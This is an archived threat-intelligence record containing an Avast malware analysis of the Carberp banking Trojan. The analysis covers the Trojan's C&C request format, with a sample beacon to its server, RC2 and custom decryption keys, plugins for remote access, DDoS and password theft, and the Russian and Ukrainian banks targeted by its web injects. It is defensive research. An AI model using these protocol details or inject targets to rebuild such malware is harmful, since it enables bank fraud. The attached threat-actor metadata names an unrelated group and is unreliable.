{
	"id": "cf7d4446-d9f4-47a4-ad74-87a1231abba4",
	"created_at": "2026-04-06T00:11:13.603988Z",
	"updated_at": "2026-04-10T13:12:37.871122Z",
	"deleted_at": null,
	"sha1_hash": "66fa38a25ed9a481bc6b653117e922e3b50c7974",
	"title": "Banking Trojan Carberp: An Epitaph?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 724867,
	"plain_text": "Banking Trojan Carberp: An Epitaph?\r\nBy Threat Intelligence Team 8 Apr 2013\r\nArchived: 2026-04-05 18:47:13 UTC\r\nThe begining of spring seems to be an unsuccessful period of the year for cybercriminals in Eastern Europe. There\r\nis recent news referring to a neutralization of a group of hackers by joint cooperation between the Security Service\r\nof Ukraine with the Federal Security Service of the Russian Federation (FSB) on the web. These hackers are\r\nresponsible for the infamous Trojan called Carberp.\r\nDue to this recent information, we are allowed to say that Carberp was as a mainstream Trojan that monitored the\r\nenvironment of infected computers and exploited remote banking systems. It was a robust modular malware that\r\nimproved its capabilities by drive-by-downloaded dynamic libraries – plugins. It was not only successfully\r\ngrabbing money from victim's bank accounts but also the attention of security experts both in an industrial and an\r\nacademic sphere (an example of a paper). Therefore there are plenty of references on the web considering the\r\nmethods of a system invasion, protection by polymorphic outer layers and a persistence of the Trojan. We will try\r\nto fill in some gaps in the picture.\r\nCarberp started its progress approximately in autumn 2010. Later in spring 2011 it was split into two main\r\nbranches regarding the form of HTTP requests. The first one used the RC4 cipher to encrypt data exchanged with\r\nC\u0026C and it posted requests in the form:\r\nhttp://\u003ctop level domain\u003e/e/\u003c8-11 random alphanumeric characters\u003e\r\nThis one faded away along with the arrest of cybercriminals in March 2012. The second one was based on RC2\r\ncipher and it generated hits with avast! shields in the wild during the last weeks. Let's see how it talked with C\u0026C.\r\nCommunication protocol\r\nA typical HTTP post looked like\r\nPOST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm HTTP/1.1\r\nAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322;\r\n.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\nHost: caaarrp2.ru\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 60\r\nwith a content of the form like this:\r\nkfq=u%2FFPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN%3D\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 1 of 10\n\nwhere ‘kfq’ is a randomly generated string which is concatenated with the equality sign and an encoded message.\r\nUnsafe characters in the encoded message are escaped with the percent sign. Let's write this particular example\r\nafter decoding:\r\nkfq=u/FPG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJkbTeN=\r\nand let's extract the first 4 symbols after the first equality symbol concatenated with the last 4 symbols (ignoring\r\nthe tailing equality symbol ) as a string. It is used as a cryptographic salt for RC2 decryption and denote it szSalt,\r\ni.e. szSalt = ‘u/FPbTeN’. Then the proper encrypted message equals (denote it szEncMsg):\r\nG1eImmXBEb3mG5VomEqE9ivVw2uh550qE1K2LoqWfJ\r\nAfter the decryption on the server-side it would be read like ‘botuid=wtfuck0780E8ABE9244C0B4’ where\r\n‘wtfuck’ is a constant encrypted in Trojan’s body and ‘780E8ABE9244C0B4’ is a particular hash of victim’s\r\nenvironment. Every sample of Carberp contained another constant - a key, denote it szKey, e.g. szKey =\r\n‘mt19YrKTaSH3kCVA’.\r\nDecryption of the content is performed in the following steps:\r\nStep 1) Extraction of the proper encrypted message and the variable szSalt. Transformation of ‘+’ to ‘\u003e’ and ‘/’ to\r\n‘?’.\r\nStep 2) Decoding of szEncMsg to a buffer au8EncMsg_Debase64\r\nStep 3) Decrypting of the buffer au8EncMsg_Debase64 to a buffer au8EncMsg_Debase64_DeRC2 using RC2\r\nwith the salt szSalt and the key szKey\r\nIf the downloaded content is an encrypted executable or a configuration file then there is another step:\r\nStep 4) Decrypting the buffer au8EncMsg_Debase64_DeRC2 using a custom algorithm decryptBJB(..) that has\r\nalready appeared in early stages of Carberp. A magic string \"BJB\" is in the header and it is followed by a key\r\nlength, a key string and a main ciphered data.\r\ncarberp_decBJB\r\nOne of the early requests going to C\u0026C is the wish for available plugins. After a successful connection a list of\r\nplugins is saved in \"%AppData\\\u003chash sequence\u003e\\wndsksi.inf\" in an encrypted form. Ignoring the first 20 bytes\r\nand using the mentioned decryptBJB algorithm with the key \"GDlet64E\" one could get something similar to:\r\nammy.plug|Y05jP1GNybVxZ3Wv6sMQCwzmJ9rhH2Rg.tiff\r\nconfig.bin|KVZswznW95xFch3X.tiff\r\nddos.plug|ZqRMXA6Cxsg1m3KbdfyF2ncYPWV78TpN.bmp\r\nifobs.plug|8X2ZWnDfSsrpYtK1hdazxcq.bmp\r\npassw.plug|53DS2x0qgvmGzwtpyrahPQW9J8nNA.tiff\r\nrdp.plug|aDb6TYnKkc3Q7N.tiff\r\nrtlext.plug|jhJrdMWzK2XqpkYV91a6tQv7Z.psd\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 2 of 10\n\nsb.plug|8DhsH4PmpSFWrV7QwA5dtbv0KJN.tiff\r\nvnc.plug|JD6HPMCQjN8kgFYcR57pdtn1y2X0rm.psd\r\nThis list shows only a subset of plugins available for the bot. The following diagram estimates the evolution of\r\navailable plugins and the time when they appeared for the first time:\r\nCarberp Evolution of Plugins\r\nDetailed analysis of plugins\r\nPlugins from early stages of development are well known (miniav.plug, stopav.plug, passw.plug) and the yellow\r\nones seemed to be obsolete in recent versions of the bot. File ddos.plug exports the only function called\r\n‘StartHTTP’ and contains a list of various HTTP referrers and domain names. The name of plugin indicates it's\r\npotential in a distributed denial-of-service attack.\r\nThe orange group contains cyberplat.plug, sb.plug (evolved from early sbtest.plug version) and ifobs.plug that try\r\nto exploit Cyberplat, iFOBS and Sberbank payment processing systems. Last month a download of a java archive\r\ncalled AgentX.jar together with an encrypted data file rt.ini ((two steps of decryption one of which is RC4 with the\r\nkey \"123%esr2#221@#\" ) was implemented in the Carberp module. They are dropped into the application\r\ndirectory of an e-banking system called IBank. The plain ini file could look like (observe that C\u0026C servers of the\r\nbot):\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 3 of 10\n\nThe archive is a successor of previously used archives patching a Java code on the fly called Agent.jar,\r\nAgentPassive.jar and AgentKP.jar. They all had a potential to fraudulently interact with a victim's payment\r\nprocessing. A text document uid.txt containing id of the running instance of the bot was created and declared a\r\nsign of infection.\r\nThe light blue group represents utilities enhancing remote spying activities of the Trojan. File vnc.plug is an\r\nexecutable that enables remote access to an infected computer via remote framebuffer protocol (RFB).\r\nAdditionally, it contains an embedded library inj_x86.dll (inj_x64.dll respectively) which provides a user mode\r\nrootkit functionality that masks processes started remotely (on \"secret_desktop\") on victim's desktop:\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 4 of 10\n\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 5 of 10\n\nThe green group is all about the plugin bot.plug which has most of the functionality of the main Carberp module\r\nin the form of a dynamically linked library exporting three functions: SetBotParameter, Start and SFFD (the latter\r\ninjects its own code into explorer as the main module does). It is produced by a generator called Bot builder:\r\nAfter a request of its download it is stored in an encrypted form in %AppData% directory for later use. It could be\r\nremotely reactivated by a command installfakedll from a C\u0026C server which leads to a drop of fake.dll into to the\r\nInternet Explorer program directory under various confusing names (e.g. sqmapi.dll, browsui.dll). A function of\r\nthis library is the decryption of stored bot.plug followed by calls of bot's exports Start and SFFD.\r\nOne of the files additionally requested is called config.bin. It is a set of JavaScript web injects performing an\r\nattack to various internet banking systems in Russia and Ukraine. Injects are triggered by particular masks in a\r\nweb browser (example of a bank targeted is in the bracket):\r\n'banking.pivdenny.com' (Pivdennyi)\r\n'ibank.svyaznoybank.ru' (Svyaznoybank )\r\n'online.rsb.ru' (Russian Standard Bank)\r\n'bsi.dll?T=RT_1Loader.Load' (OJSC Nordea Bank)\r\n'ifobsClient/ifobstoday' (iFOBS Online Banking System, OTP Bank Ukraine)\r\nlibertyreserve (LibertyReserve)\r\nprivatbank (PrivateBank Ukraine)\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 6 of 10\n\nTo demonstrate a concept of injects on the mask \"google.com\" just observe the process of its creation in the\r\nfollowing steps: Chosing data before and data after a desired replacement of HTML code and filling the space\r\nwith own code, then displaying how a source code appears in the configuration file and finally how it changes a\r\ncontent of a web page:\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 7 of 10\n\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 8 of 10\n\nCarberp on Android\r\nAt the end of 2012, three malicious Android applications were mentioned in connection with Carberp (nicknamed\r\nCaberp-in-the-Mobile by security researchers) that tried to extend it’s fraudulent activities to mobile devices (a\r\ntriple represents application name, it's MD5 hash and a detection by avast! engine):\r\nSberSafe f27d43dfeedffac2ec7e4a069b3c9516 Android:Spitmo-E [Trj]\r\nAlfaSafe 07d2ee88083f41482a859cd222ec7b76 Android:SpyCitmo-D [Trj]\r\nVkSafe 117d41e18cb3813e48db8289a40e5350 Android:SpyCitmo-C [Trj]\r\nThese apps posted HTTP requests in the form:\r\nhttp://ber\u003cREMOVED\u003e.com/m/fo125kepro;http://ber\u003cREMOVED\u003e.com/m/as225kerto ;\r\nwith the domain that was also used as C\u0026C by the branch of Carberp using RC4 encryption. The conclusion is\r\nthat these apps are probably not connected with the bot we have analyzed.\r\nSources\r\nFinally MD5 of some selected samples with the detections of avast! engine:\r\nCarberp Bot (version 1.8) 422ec27f405ea8415a6dd606f53ec5ca Win32:Carberp-ANO [Trj]\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 9 of 10\n\nsb.plug 3150522d039ea64715951d2461c04b9f Win32:Carberp-AI [Trj]\r\nrdp.plug 5f93b2f8d8c0f6f00f3cc99adbe7efc0 Win32:SpyeyePlugin-E [Trj]\r\nddos.plug e20146551b34409d71dde02a8e3d5c15 Win32:CarberpPlugin-L [Trj]\r\nvnc.plug 5683fcb77c6f6447aba75b44338cb461 Win32:CarberpPlugin-K [Trj]\r\nifobs.plug c96ff5f3ec55220e99b9d7c8a3a98e8f Win32:CarberpPlugin-M [Trj]\r\nbot.plug f29e19cbe20dd7e0eba5d1ff09abdbbb Win32:CarberpPlugin-P [Trj]\r\nfake.dll 6b2fcfa7cb57a44d28530eaf28ac253e Win32:CarberpPlugin-N [Trj]\r\nammy.plug 3b91280aa14a1dc0870f53f76a48c3f8 Win32:AmmyyRAdmin-A [PUP]\r\niphlpapi.dll 0993ac70dd8ab896ae349f45cc82d63d Win32:CarberpPlugin-Q [Trj]\r\nActiveX.jar 46f348d9a990004d8e2c5694f5544f56 Java:Carberp-A [Trj]\r\npassw.plug 38956767859e03e126f1d79c0f0e3ea0 Win32:CarberpPlugin-D [Trj]\r\nAcknowledgment\r\nSincere gratitude goes to my colleague Jaromír Hořejší for cooperation on this analysis.\r\nSource: https://blog.avast.com/2013/04/08/carberp_epitaph/\r\nhttps://blog.avast.com/2013/04/08/carberp_epitaph/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.avast.com/2013/04/08/carberp_epitaph/"
	],
	"report_names": [
		"carberp_epitaph"
	],
	"threat_actors": [
		{
			"id": "67bf0462-41a3-4da5-b876-187e9ef7c375",
			"created_at": "2022-10-25T16:07:23.44832Z",
			"updated_at": "2026-04-10T02:00:04.607111Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"Careto",
				"The Mask",
				"Ugly Face"
			],
			"source_name": "ETDA:Careto",
			"tools": [
				"Careto"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f5bf6853-3f6e-452c-a7b7-8f81c9a27476",
			"created_at": "2023-01-06T13:46:38.677391Z",
			"updated_at": "2026-04-10T02:00:03.064818Z",
			"deleted_at": null,
			"main_name": "Careto",
			"aliases": [
				"The Mask",
				"Ugly Face"
			],
			"source_name": "MISPGALAXY:Careto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434273,
	"ts_updated_at": 1775826757,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/66fa38a25ed9a481bc6b653117e922e3b50c7974.pdf",
		"text": "https://archive.orkl.eu/66fa38a25ed9a481bc6b653117e922e3b50c7974.txt",
		"img": "https://archive.orkl.eu/66fa38a25ed9a481bc6b653117e922e3b50c7974.jpg"
	}
}